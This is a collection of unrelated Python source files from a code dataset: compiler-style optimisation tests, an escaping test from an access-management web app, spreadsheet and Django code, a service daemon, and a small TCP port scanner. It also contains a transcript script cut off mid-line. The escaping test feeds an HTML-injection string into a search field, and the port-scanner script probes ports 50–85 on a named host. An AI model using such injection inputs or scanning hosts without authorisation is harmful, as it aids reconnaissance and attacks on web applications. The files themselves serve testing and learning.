]))\n\n with it('simplifies re-reads after write (regression)'):\n expect(sa_mem_elim([\n ('s1', '[4]=', 0),\n ('r1', '=[4]', 0),\n ('r2', '=[4]', 0),\n ])).to(equal([\n ('s1', '[4]=', 0),\n ('r1', '=[4]', 0),\n ('r2', '=', 'r1'),\n ]))\n\n with it('does not simplify for write in-between with overlap'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n (2, '[4]=', 2),\n ('r1', '=[4]', 0),\n ])).to(equal([\n (0, '[4]=', 1),\n (2, '[4]=', 2),\n ('r1', '=[4]', 0),\n ]))\n\n with it('does not simplify for write in-between with unknown register'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n ('s1', '[4]=', 2),\n ('r1', '=[4]', 0),\n ])).to(equal([\n (0, '[4]=', 1),\n ('s1', '[4]=', 2),\n ('r1', '=[4]', 0),\n ]))\n\n with description('write'):\n with it('removes redundant write even if unrelated value is read in-between'):\n # redundant write if unrelated value is read in-between\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n ('r1', '=[4]', 4),\n (0, '[4]=', 2),\n ])).to(equal([\n ('r1', '=[4]', 4),\n (0, '[4]=', 2),\n ]))\n\n with it('preserves write if overlapped value is read in-between'):\n expect(sa_mem_elim([\n (0, '[4]=', 1),\n ('r1', '=[4]', 2),\n (0, '[4]=', 2),\n ])).to(equal([\n (0, '[4]=', 1),\n ('r1', '=[4]', 2),\n (0, '[4]=', 2),\n ]))\n\n with it('preserves write if unknown memory is read in-between'):\n expect((sa_mem_elim([\n (0, '[4]=', 1),\n ('r1', '=[4]', 's1'),\n (0, '[4]=', 2),\n ]))).to(equal([\n (0, '[4]=', 1),\n ('r1', '=[4]', 's1'),\n (0, '[4]=', 2),\n ]))\n\nwith description('sa_common_subexpr'):\n with it('substitutes common expressions'):\n expect(sa_common_subexpr([\n ('r2', '=', '*', 'r0', 'r1'),\n ('r3', '=', '*', 'r0', 'r1'),\n ])).to(equal([\n ('r2', '=', '*', 'r0', 'r1'),\n ('r3', '=', 'r2'),\n ]))\n\nwith description('sa_copy_propagate'):\n with it('substitutes expressions with their equivalents'):\n expect(sa_copy_propagate([\n ('r1', '=', 'r0'),\n ('r3', '=', '*', 'r1', 'r2'),\n ])).to(equal([\n ('r1', '=', 'r0'),\n ('r3', '=', '*', 'r0', 'r2'),\n ]))\n\n with it('substitutes memory write vars with their equivalents'):\n expect(sa_copy_propagate([\n ('r1', '=', 'r0'),\n ('r1', '[4]=', '*', 'r2', 'r3'),\n ])).to(equal([\n ('r1', '=', 'r0'),\n ('r0', '[4]=', '*', 'r2', 'r3'),\n ]))\n\nwith description('sa_sub_assign_retrieve'):\n with it('replaces sub assign then retrieve with an assign equivalent'):\n expect(sa_sub_assign_retrieve([\n ('r1', 'l=', 'r0'),\n ('r2', '=l', 'r1'),\n ('r4', 'h=', 'r3'),\n ('r5', '=h', 'r4'),\n ('r7', 'x=', 'r6'),\n ('r8', '=x', 'r7'),\n ])).to(equal([\n ('r1', 'l=', 'r0'),\n ('r2', '=', 'r0'),\n ('r4', 'h=', 'r3'),\n ('r5', '=', 'r3'),\n ('r7', 'x=', 'r6'),\n ('r8', '=', 'r6'),\n ]))\n\nwith description('sa_const_fold'):\n with it('folds + and -'):\n expect(sa_const_fold([\n ('r0', '=', '+', 1, 2),\n ('r1', '=', '-', 3, 1),\n ])).to(equal([\n ('r0', '=', 3),\n ('r1', '=', 2),\n ]))\n\nwith description('sa_dead_code_elim'):\n with it('preserves writes to useful vars and any ancestor vars which taint useful vars'):\n expect(sa_dead_code_elim([\n ('r_0', '=', 1),\n ('r_1', '=', 'r_0'),\n ('s_0', '=', 'r_1'),\n ('t_0', '=', 'r_1'),\n ], ['s_0'])).to(equal([\n ('r_0', '=', 1),\n ('r_1', '=', 'r_0'),\n ('s_0', '=', 'r_1'),\n ]))\n\n with it('preserves writes to memory and any ancestor vars which taint any var in the expression'):\n expect(sa_dead_code_elim([\n ('r_0', '=', 1),\n ('r_1', '=', 2),\n ('r_2', '=', 3),\n ('r_2', '[4]=', '+', 'r_0', 'r_1'),\n (0, '[4]=', '+', 'r_0', 'r_1'),\n ('t_0', '=', 'r_1'),\n ], [])).to(equal([\n ('r_0', '=', 1),\n ('r_1', '=', 2),\n ('r_2', '=', 3),\n ('r_2', '[4]=', '+', 'r_0', 'r_1'),\n (0, '[4]=', '+', 'r_0', 'r_1'),\n ]))\n\nwith description('block_simplify'):\n with it('converts to and from ssa form'):\n with patch('analysis.block.sa_to_ssa', side_effect=[([], {})]) as sa_to_ssa_, \\\n patch('analysis.block.ssa_to_sa', side_effect=[([], {})]) as ssa_to_sa_:\n block_simplify(Block())\n expect(sa_to_ssa_.call_count).to(equal(1))\n expect(ssa_to_sa_.call_count).to(equal(1))\n\n with it('repeatedly calls simplification routines until the lengths of instructions stay constant'):\n with ExitStack() as stack:\n sa_simps = [stack.enter_context(patch(f'analysis.block.{name}', side_effect=(\n (lambda instrs: instrs) if name != 'sa_dead_code_elim' else\n (lambda instrs, _: instrs[:-1] if len(instrs) > 2 else instrs[::-1])\n ))) for name in [\n 'sa_expr_simp', 'sa_common_subexpr', 'sa_sub_assign_retrieve', 'sa_copy_propagate', 'sa_const_fold',\n 'sa_mem_elim', 'sa_dead_code_elim',\n ]]\n block = Block(instrs=[\n ('eax', '=', 0),\n ('eax', '=', 1),\n ('eax', '=', 2),\n ('eax', '=', 3),\n ])\n block_simplify(block)\n for sa_simp in sa_simps:\n expect(sa_simp.call_count).to(equal(3))\n expect(len(block.instrs)).to(equal(2))\n\n with it('maps block condition'):\n block = Block(instrs=[('tmp_2', '=', 0), ('tmp_3', '=', 1)])\n block.condition = 'tmp_3'\n block_simplify(block)\n expect(block.condition).to(equal('tmp_1'))\n","repo_name":"stevenxxiu/asmdeobf","sub_path":"analysis/specs/block_spec.py","file_name":"block_spec.py","file_ext":"py","file_size_in_byte":15771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74594533310","text":"from typing import TYPE_CHECKING\n\nimport pytest\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom itests.pages.search_results import SearchResultsPage\nfrom itests.pages.users import UserViewPage\nfrom itests.setup import frontend_server\nfrom tests.url_util import url\n\nif TYPE_CHECKING:\n from py._path.local import LocalPath\n from selenium.webdriver import Chrome\n from tests.setup import SetupTest\n\n\ndef test_search(tmpdir, setup, browser):\n # type: (LocalPath, SetupTest, Chrome) -> None\n with setup.transaction():\n setup.create_group(\"group-some\")\n setup.create_permission(\"awesome-permission\")\n setup.create_user(\"some@a.co\")\n\n with frontend_server(tmpdir, \"gary@a.co\") as frontend_url:\n browser.get(url(frontend_url, \"/\"))\n\n page = UserViewPage(browser)\n page.search_input.send_keys(\"some\")\n page.click_search_button()\n\n results_page = SearchResultsPage(browser)\n print(results_page.root.page_source)\n results = [(r.type, r.name) for r in results_page.result_rows]\n assert sorted(results) == [\n (\"Group\", \"group-some\"),\n (\"Permission\", \"awesome-permission\"),\n (\"User\", \"some@a.co\"),\n ]\n\n\ndef test_search_escaping(tmpdir, setup, browser):\n # type: (LocalPath, SetupTest, Chrome) -> None\n with frontend_server(tmpdir, \"gary@a.co\") as frontend_url:\n browser.get(url(frontend_url, \"/\"))\n\n page = UserViewPage(browser)\n page.search_input.send_keys('SEARCH\">foo')\n page.click_search_button()\n\n results_page = SearchResultsPage(browser)\n with pytest.raises(NoSuchElementException):\n results_page.find_element_by_tag_name(\"marquee\")\n","repo_name":"dropbox/merou","sub_path":"itests/fe/search_test.py","file_name":"search_test.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"60"} +{"seq_id":"3343459124","text":"# calcular valor da soma com n termos\n\nN = int(input('Digite o valor de N: '))\n\nnum1 = 37\nnum2 = 38\nsoma = 0\n\nfor den in range (1,N+1):\n soma = ( ( num1 * num2 ) / den ) + soma\n num1 -= 1\n num2 -= 1\n\nprint (f'O valor da soma da série com {N} termos é igual a {soma}')\n\n","repo_name":"luizppbarbosa/UFPE-Introducao-a-Programacao","sub_path":"Arquivos/slide 5 exemplo 8.py","file_name":"slide 5 exemplo 8.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70004104513","text":"import openpyxl\nimport time\n\n\ndef cresce_colunas(lista_colunas):\n tamanho = len(lista_colunas[-1])\n if ord(lista_colunas[-1][-1]) < 90:\n lista_colunas.append(lista_colunas[-1][0:-1] + chr(ord(lista_colunas[-1][-1]) + 1))\n elif tamanho > 1 and ord(lista_colunas[-1][-2]) < 90:\n lista_colunas.append(lista_colunas[-1][0:-2] + chr(ord(lista_colunas[-1][-2]) + 1) + 'A')\n elif tamanho > 2 and ord(lista_colunas[-1][-3]) < 90:\n lista_colunas.append(lista_colunas[-1][0:-3] + chr(ord(lista_colunas[-1][-3]) + 1) + 'AA')\n elif tamanho == 1:\n lista_colunas.append('AA')\n elif tamanho == 2:\n lista_colunas.append('AAA')\n else:\n print('Por favor, contate o suporte')\n return\n return lista_colunas\n\n\ndef descobre_numero(coluna):\n lista_colunas = ['A']\n while lista_colunas[-1] != coluna:\n cresce_colunas(lista_colunas)\n return len(lista_colunas)\n\n\ndef descobre_colunas(quantidade):\n lista_colunas = ['A']\n while len(lista_colunas) < quantidade:\n lista_colunas = cresce_colunas(lista_colunas)\n return lista_colunas\n\n\nprint('Iniciando Programa')\n\nwhile True:\n try:\n planilha1 = input('Digite o nome da planilha mais atual: ')\n planilha1 = openpyxl.load_workbook(filename=planilha1+ '.xlsx')\n aba1 = planilha1.active\n break\n except:\n print('Planilha nao encontrada, favor digitar novamente: ')\n\nlinhas_aba1 = aba1.max_row\ncolunas_aba1 = aba1.max_column\n\nwhile True:\n try:\n planilha2 = input('Digite o nome da planilha desatualizada: ')\n planilha2 = openpyxl.load_workbook(filename=planilha2 + '.xlsx')\n aba2 = planilha2.active\n break\n except:\n print('Planilha nao encontrada, favor digitar novamente: ')\n\nlinhas_aba2 = aba2.max_row\ncolunas_aba2 = aba2.max_column\n\ncoluna = input('Digite a coluna a ser analisada: ').upper()\ncoluna = descobre_numero(coluna)\n\nwhile True:\n inicio = int(input('As planilhas apresentam cabecalho?\\n1 - Nao\\n2 - Sim\\n'))\n if inicio == 1 or inicio == 2:\n break\n else:\n print('Por favor, digite o numero referente a resposta')\n\nnome_planilha = input('Digite o nome da planilha a ser salva: ')\n\nplanilha3 = openpyxl.Workbook()\naba3 = planilha3.active\n\nlista_colunas = descobre_colunas(colunas_aba1 + 1)\n\nif inicio == 1:\n contador = 1\n \nelse:\n contador = 2\n for i in range(1, colunas_aba1 + 1):\n aba3.cell(1, i, value=aba1.cell(1, i).value)\n aba3.cell(1, colunas_aba1 + 1, value='Status')\n\nfor i in range(inicio, linhas_aba1 + 1):\n valor_analise = aba1.cell(i, coluna).value\n k = inicio\n while k <= linhas_aba2:\n if valor_analise == aba2.cell(k, coluna).value:\n for j in range(1, colunas_aba1 + 1):\n if aba1.cell(i, j).value != aba2.cell(k, j).value:\n for h in range(1, colunas_aba1 + 1):\n aba3.cell(contador, h, value=aba1.cell(i, h).value)\n aba3.cell(contador + 1, h, value=aba2.cell(k, h).value)\n if aba1.cell(i, h).value != aba2.cell(k, h).value:\n aba3.cell(contador, h).font = openpyxl.styles.Font(color=\"00FF0000\")\n aba3.cell(contador, h).fill = openpyxl.styles.PatternFill(fill_type='solid', start_color='FFD890', end_color='FFD890')\n aba3.cell(contador + 1, h).font = openpyxl.styles.Font(color=\"000000FF\")\n aba3.cell(contador + 1, h).fill = openpyxl.styles.PatternFill(fill_type='solid', start_color='ADD8E6', end_color='ADD8E6')\n else:\n aba3.cell(contador, colunas_aba1 + 1, value='Desatualizado')\n aba3.cell(contador + 1, colunas_aba1 + 1, value='Atualizado')\n contador += 2\n break\n aba2.delete_rows(k)\n linhas_aba2 -= 1\n k -= 1\n break\n k += 1\n else:\n for h in range(1, colunas_aba1 + 1):\n aba3.cell(contador, h, value=aba1.cell(i, h).value)\n else:\n aba3.cell(contador, colunas_aba1 + 1, value='Adicionado')\n contador += 1\n\nlinhas_aba2 = aba2.max_row\n\nfor i in range(inicio, linhas_aba2 + 1):\n for j in range(1, colunas_aba2 + 1):\n aba3.cell(contador, j, value=aba2.cell(i, j).value)\n else:\n aba3.cell(contador, colunas_aba1 + 1, value='Excluido')\n contador += 1\n\nplanilha3.save(nome_planilha + '.xlsx')\n\nprint('Programa Finalizado')\n\ntime.sleep(3.5)\n","repo_name":"Boreias/Verificador_de_Planilhas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12284709615","text":"import os\nimport pytest\nfrom pytest_bdd import given\nfrom sqlalchemy import create_engine\n\nimport journal\nfrom test_journal import login_helper\n\n\nTEST_DATABASE_URL = os.environ.get(\n 'DATABASE_URL',\n 'postgresql://gracehatamyar@localhost:5432/test-learning-journal'\n )\nos.environ['DATABASE_URL'] = TEST_DATABASE_URL\n\n\n@pytest.fixture(scope='session')\ndef connection(request):\n engine = create_engine(TEST_DATABASE_URL)\n journal.Base.metadata.create_all(engine)\n # create connection to our database\n # this opens a transaction that last for the scope\n # of the entire session\n connection = engine.connect()\n journal.DBSession.registry.clear()\n # bind this in the name space of journal\n journal.DBSession.configure(bind=connection)\n journal.Base.metadata.bind = engine\n request.addfinalizer(journal.Base.metadata.drop_all)\n return connection\n\n\n@pytest.fixture()\ndef db_session(request, connection):\n # starts a new transaction inside the already open transaction\n from transaction import abort\n trans = connection.begin()\n # every test has a transaction that's open for the duration\n # of the test, and rollsback when the test is completed\n request.addfinalizer(trans.rollback)\n request.addfinalizer(abort)\n\n from journal import DBSession\n return DBSession\n\n\n@pytest.fixture()\ndef app(db_session):\n from journal import main\n from webtest import TestApp\n app = main()\n return TestApp(app)\n\n\n@pytest.fixture()\ndef homepage(app):\n response = app.get('/')\n return response\n\n\n@pytest.fixture()\ndef entry_page(homepage):\n redirect = homepage.click(description='Read', index=0)\n return redirect\n\n\n@pytest.fixture()\ndef edit_page(app):\n response = app.get('/edit/0', status=403)\n return response\n\n\n# @pytest.fixture()\n# def author(app):\n# username, password = ('admin', 'secret')\n# login_helper(username, password, app)\n# response = app.get('/')\n# return response\n\n\n# @pytest.fixture()\n# def edit_page_author(author):\n# response = app.get('/edit/0')\n# return response\n","repo_name":"gatita/learning-journal","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"34363511457","text":"# 구현\n# 달팽이\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nm = int(input())\n\n# https://velog.io/@hygge/Python-%EB%B0%B1%EC%A4%80-1913-%EB%8B%AC%ED%8C%BD%EC%9D%B4-Brute-Force 참고\n\nboard = [[0] * n for _ in range(n)]\n\ndr = [0, 1, 0, -1] # 오른쪽, 아래쪽, 왼쪽, 위쪽 순서\ndc = [1, 0, -1, 0]\n\nr = n//2 # 시작 row\nc = n//2 # 시작 column\nnum = 1 # 해당 위치에 들어갈 숫자 1씩 증가 예정\nlen = 0 # 특정 방향으로 이동할 길이 얼마나 더할 것인가. for 문으로 동일 작업 수행 가능.\n\nboard[r][c] = num\n\nwhile True:\n for i in range(4):\n for _ in range(len): # 특정 방향으로 한칸씩 이동하며 숫자 입력\n r += dr[i]\n c += dc[i]\n num += 1\n board[r][c] = num\n if num == m: # 찾을 번호의 인덱스 저장\n ans = [r+1, c+1]\n\n if r == c == 0:\n break\n r -= 1\n c -= 1\n len += 2\n\nfor i in range(n):\n print(*board[i])\nprint(*ans)\n","repo_name":"kimssumin/algorithm","sub_path":"BOJ_1913.py","file_name":"BOJ_1913.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37482999542","text":"from django.http import HttpResponse\nfrom django.views.generic import View\nimport json\nfrom systems.models import Machine\n\n\nclass MachineAjaxUpdate(View):\n\n def get(self, _):\n data = {}\n for machine in Machine.objects.all():\n data[machine.id] = {\n 'security': machine.security_packages,\n 'total': machine.total_packages,\n 'reboot': machine.requires_restart\n }\n\n return HttpResponse(content=json.dumps(data), content_type='application/json')\n","repo_name":"pombredanne/butler-1","sub_path":"butler/systems/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70376376831","text":"class Solution:\n mod = 10**9+7\n def sumSubseqWidths(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n A.sort()\n ans = 0\n for i, x in enumerate(A):\n ans = (ans + x * pow(2, i, self.mod) - x * pow(2, len(A)-i-1, self.mod)) % self.mod\n return ans\nprint(Solution().sumSubseqWidths([1,2,3]))","repo_name":"goagain/Contests","sub_path":"leetcode/891/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"5150821617","text":"from langchain import LLMChain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import (\n AIMessage,\n HumanMessage,\n SystemMessage,\n)\nfrom langchain.prompts.chat import (\n ChatPromptTemplate,\n SystemMessagePromptTemplate,\n HumanMessagePromptTemplate,\n)\nimport openai\nfrom . import (\n OPENAI_API_KEY,\n SYSTEM_TEMPLATE,\n HUMAN_TEMPLATE,\n QUESTION_2,\n DSL_2,\n QUESTION_1,\n DSL_1,\n)\n\n\ndef build_dsl_template():\n system_message_prompt = SystemMessage(content=SYSTEM_TEMPLATE)\n human_message_prompt = HumanMessagePromptTemplate.from_template(HUMAN_TEMPLATE)\n\n chat_prompt = ChatPromptTemplate.from_messages(\n [system_message_prompt, human_message_prompt]\n )\n\n return chat_prompt\n\n\ndef dsl_template(question: str):\n chat_prompt = build_dsl_template()\n msg = chat_prompt.format_messages(\n question=question,\n )\n return msg\n\n\ndef dsl_chain(question: str, *, model: str):\n chat = ChatOpenAI(\n model=model,\n openai_api_key=OPENAI_API_KEY,\n )\n\n chat_prompt = build_dsl_template()\n\n chain = LLMChain(\n llm=chat,\n prompt=chat_prompt,\n )\n ans = chain.run(\n question=question,\n )\n return ans\n","repo_name":"kingh0730/build_from_the_stack","sub_path":"dataset_apps_decode_gen_input/src/dataset_apps_decode_gen_input/langchain_dsl/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"25831799946","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db.models.fields import BooleanField, TextField\n\n# Create your models here.\n\nMEDIUMTYPE = (\n (\"CH\", \"Charcoal\"),\n (\"CP\", \"Colored Pencil\"),\n (\"IA\", \"Alcohol Ink\"),\n (\"II\", \"India Ink\"),\n (\"IW\", \"Water-based Ink\"),\n (\"GR\", \"Graphite\"),\n (\"MA\", \"Alcohol Marker\"),\n (\"MW\", \"Water-based Marker\"),\n (\"PA\", \"Acrylic Paint\"),\n (\"PG\", \"Gouache Paint\"),\n (\"PO\", \"Oil Paint\"),\n (\"PW\", \"Watercolor Paint\"),\n (\"PH\", \"Hard Pastel\"),\n (\"OP\", \"Oil Pastel\"),\n (\"PP\", \"Pan Pastel\"),\n (\"PS\", \"Soft Pastel\"),\n (\"BP\", \"Ballpoint Pen\"),\n (\"PB\", \"Brush Pen\"),\n (\"GE\", \"Gel Pen\"),\n (\"PL\", \"Fineliner Pen\"),\n (\"PF\", \"Fountain Pen\"),\n (\"PE\", \"Paint Pen\"),\n)\n\nclass Artsupply(models.Model):\n name = models.CharField(max_length = 100)\n brand = models.CharField(max_length = 100)\n medium = models.CharField(\n max_length=2,\n choices=MEDIUMTYPE,\n default=MEDIUMTYPE[0][0])\n familiarity = models.IntegerField(\n \"Familiarity on a scale of 0 (first time using this material) to 5 (Regular professional use)\",\n default=0,\n validators=[MaxValueValidator(5), MinValueValidator(0)]\n )\n description = TextField(max_length=500)\n favorite = BooleanField(\"Check this box if you'll use it again\")\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse(\"artsupplies_detail\", kwargs={\"artsupply_id\": self.id})\n\n\nclass Photo(models.Model):\n url = models.CharField(max_length=250)\n artsupply = models.ForeignKey(Artsupply, on_delete=models.CASCADE)\n\n def __str__(self):\n return f\"Photo for artsupply_id: {self.artsupply_id} @{self.url}\"","repo_name":"tayannewest/swatchdog","sub_path":"main_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19214642044","text":"import os\nimport logging\nimport time\nfrom daemonize import Daemonize\nimport argparse\nimport signal\n\nDESCRIPTION = \"\"\"\nRun the SG Jira web app as a Linux service.\n\nThis script can be used with a systemd setup and handles the usual start, stop,\nrestart and status actions.\n\nThe running process daemonizes itself and its pid is stored in a pid file.\n\"\"\"\n\nlogger = logging.getLogger(\"service\")\n# Ensure basic logging is always enabled\nlogging.basicConfig(format=\"%(levelname)s:%(name)s:%(message)s\")\nlogger.setLevel(logging.DEBUG)\n\n\ndef status(pid_file):\n \"\"\"\n Return the pid of the service if it is running.\n\n :param str pid_file: Full path to the pid file used by the service.\n :returns: The process pid as an int if it is running, `None` otherwise.\n \"\"\"\n if not os.path.exists(pid_file):\n return None\n\n pid = None\n with open(pid_file, \"r\") as pf:\n pid = pf.read().strip()\n\n if not pid:\n logger.error(\"Unable to retrieve pid from %s\" % pid_file)\n return None\n\n if not pid.isdigit():\n logger.error(\"Invalid pid %s read from %s\" % (pid, pid_file))\n return None\n\n pid = int(pid)\n\n try:\n # Send 0 signal to check if the process is alive.\n os.kill(pid, 0)\n except OSError as e:\n logger.debug(\"%s\" % e, exc_info=True)\n return None\n return pid\n\n\ndef start(pid_file, port_number, settings, log_file=None):\n \"\"\"\n Start the service.\n\n :param str pid_file: Full path to the pid file used by the service.\n :param int port_number: The port number for the web app to listen on.\n :param str settings: Full path to settings file for the web app.\n :param str log_file: An optional log file to use for the daemon output. By\n default the daemon uses a syslog handler.\n \"\"\"\n keep_fds = []\n if log_file:\n fh = logging.FileHandler(log_file, \"a\")\n fh.setLevel(logging.INFO)\n logger.addHandler(fh)\n keep_fds = [fh.stream.fileno()]\n\n # Inline function so we can pass a callable to Daemonize with our parameters\n # set.\n def start_wep_app():\n import logging\n\n logger = logging.getLogger(\"service\").getChild(\"sg_jira\")\n logger.info(\"Starting wep app...\")\n try:\n import webapp\n\n webapp.run_server(port=port_number, settings=settings)\n except Exception as e:\n logger.exception(e)\n logger.warning(\"bye\")\n\n logger.info(\"Starting daemon with pid file %s\" % pid_file)\n daemon = Daemonize(\n app=\"sg_jira\",\n pid=pid_file,\n action=start_wep_app,\n keep_fds=keep_fds,\n logger=logger if log_file else None,\n )\n daemon.start()\n\n\ndef stop(pid_file):\n \"\"\"\n Stop the service if it is running.\n\n :param str pid_file: Full path to the pid file used by the service.\n \"\"\"\n # Get the running process pid, if any\n pid = status(pid_file)\n if not pid:\n return\n\n try:\n os.kill(pid, signal.SIGTERM)\n # Give the process some time to exit nicely\n time.sleep(0.1)\n # Send a SIGKILL signal but ignore errors\n try:\n os.kill(pid, signal.SIGKILL)\n except OSError:\n pass\n except OSError as e:\n # Catch the error in case the process exited between our check and our\n # attempt to stop it.\n logger.warning(\n \"Unable to stop process %d, assuming it is already stopped: %s\" % (pid, e)\n )\n logger.debug(str(e), exc_info=True)\n # Clean up\n if os.path.exists(pid_file):\n os.remove(pid_file)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=DESCRIPTION)\n parser.add_argument(\n \"--pid_file\",\n default=\"/tmp/sg_jira.pid\",\n help=\"Full path to a file where to write the process pid.\",\n )\n parser.add_argument(\n \"--log_file\", help=\"Full path to a file where to log output.\",\n )\n parser.add_argument(\n \"--port\", type=int, default=9090, help=\"The port number to listen on.\",\n )\n parser.add_argument(\"--settings\", help=\"Full path to settings file.\", required=True)\n parser.add_argument(\n \"action\",\n choices=[\"start\", \"stop\", \"restart\", \"status\"],\n help=\"Action to perform.\",\n )\n args = parser.parse_args()\n\n if args.action == \"start\":\n start(\n args.pid_file, args.port, os.path.abspath(args.settings), args.log_file,\n )\n elif args.action == \"stop\":\n stop(args.pid_file)\n elif args.action == \"status\":\n pid = status(args.pid_file)\n if pid:\n logger.info(\"Service is running with pid %d\" % pid)\n else:\n logger.info(\"Service is not running.\")\n elif args.action == \"restart\":\n stop(args.pid_file)\n start(\n args.pid_file, args.port, os.path.abspath(args.settings), args.log_file,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shotgunsoftware/sg-jira-bridge","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"7938638179","text":"nota1 = float(input('Digite a primeira nota: '))\nnota2 = float(input('Digite a segunda nota: '))\nmedia = (nota1 + nota2) / 2\nprint('A média das notas {} e {} é {}'.format(nota1,nota2,media))\n\nif media < 5:\n print('\\033[31m=== REPROVADO ===\\033[31m')\nelif media >= 5 and media <= 5.9:\n print('\\033[31m=== RECUPERAÇÃO ===\\033[31m')\nelif media >= 7 and media <= 10:\n print('\\033[31m=== APROVADO ===\\033[31m')\n","repo_name":"Lucas-Chaves-Junker/Projetos-em-Python","sub_path":"Exercícios/Exercícios/ex040 - Aquele clássico da Média.py","file_name":"ex040 - Aquele clássico da Média.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9653295193","text":"from nltk.corpus import stopwords\r\nimport dataclean\r\nimport pickle\r\n\r\npath='data\\\\lg.pkl'\r\nmodel = pickle.load(open(path, 'rb'))\r\npath1='data\\\\count.pkl'\r\nvector=pickle.load(open(path1,'rb'))\r\ndc = dataclean.Dataclean()\r\n\r\ndef find(x):\r\n x = dc.lower_case_convertion(x)\r\n x = dc.remove_punctuation(x)\r\n x = dc.numtowords(x)\r\n x = dc.lower_case_convertion(x)\r\n x = dc.remove_html_tags_beautifulsoup(x)\r\n x = dc.remove_urls(x)\r\n x = dc.accented_to_ascii(x)\r\n x = dc.remove_extra_spaces(x)\r\n x = dc.remove_single_char(x)\r\n stop = stopwords.words('english')\r\n x= ' '.join([word for word in x.split() if word not in (stop)])\r\n x = dc.emoji_words(x)\r\n x = dc.lemmatization(x)\r\n x = [x]\r\n vect = vector.transform(x).toarray()\r\n my_prediction = model.predict(vect)\r\n val = my_prediction[0]\r\n label={0:'religion', \r\n 1:'age', \r\n 2:'gender', \r\n 3:'ethnicity', \r\n 4:'not_cyberbullying', \r\n 5:'other_cyberbullying'}\r\n msg = label[val]\r\n print(msg)\r\n\r\n","repo_name":"omprakashselvaraj/cyberbullying-0.0.1","sub_path":"cyberbullying.py","file_name":"cyberbullying.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14058285793","text":"#!/bin/python3\nimport sys\nimport socket\nfrom datetime import datetime\n\nif len(sys.argv) == 2:\n\ttarget = socket.gethostbyname(sys.argv[1])\n\tprint(\"-\" * 50)\n\tprint(f\"Scanning target: {target}\")\n\tprint(f\"Time started: {datetime.now()}\")\n\tprint(\"-\" * 50)\n\ttry:\n\t\tfor port in range(50, 85):\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\tsocket.setdefaulttimeout(1)\n\t\t\tresult = s.connect_ex((target, port))\n\t\t\tif result == 0:\n\t\t\t\tprint(f\"Port {port} status: open\")\n\t\t\ts.close()\n\texcept KeyboardInterrupt:\n\t\tprint(f\"Exiting program\")\n\t\tsys.exit()\n\texcept socket.gaierror:\n\t\tprint(f\"Hostname couldn't be resolved\")\n\t\tsys.exit()\n\texcept socket.error:\n\t\tprint(f\"Couldn't connect to server\")\n\t\tsys.exit()\n\t\t\t\nelse:\n\tprint(f\"Invalid number of arguments\")\n\tprint(f\"Syntax: python3 scanner.py \")\n","repo_name":"blacklantern047/PortScanner","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31807147894","text":"\n\n#'/home/tati/Рабочий стол/DataSet2/dev-clean (1)/LibriSpeech/dev-clean/ 422/137823/251-137823.trans.txt'\nimport csv\nimport os\n\nfilename11 = '/home/tati/Рабочий стол/DataSet2/dev-clean (1)/LibriSpeech/dev-clean/'\nfilename111 = '8842'\nfilename1111 = '304647'\nfilename11111 = '.trans.txt'\nfilename1 = filename11 + filename111 + '/' + filename1111 + '/' + filename111 + '-' + filename1111 + filename11111\n\nfilename2 = 'texts/'\nfilename3 = '/home/tati/Рабочий стол/DataSet2/dev-clean (1)/LibriSpeech/dev-clean/' + filename111 + '/' + filename1111 + '/'\n\nfilename4 = 'audio_clips/'\n\n\nwith open(filename1, 'r+', newline='') as csv_file:\n reader = csv.reader(csv_file, delimiter=\"\\n\")\n for row in reader:\n i = row[0]\n to_txt = i.split(' ', 1)\n name 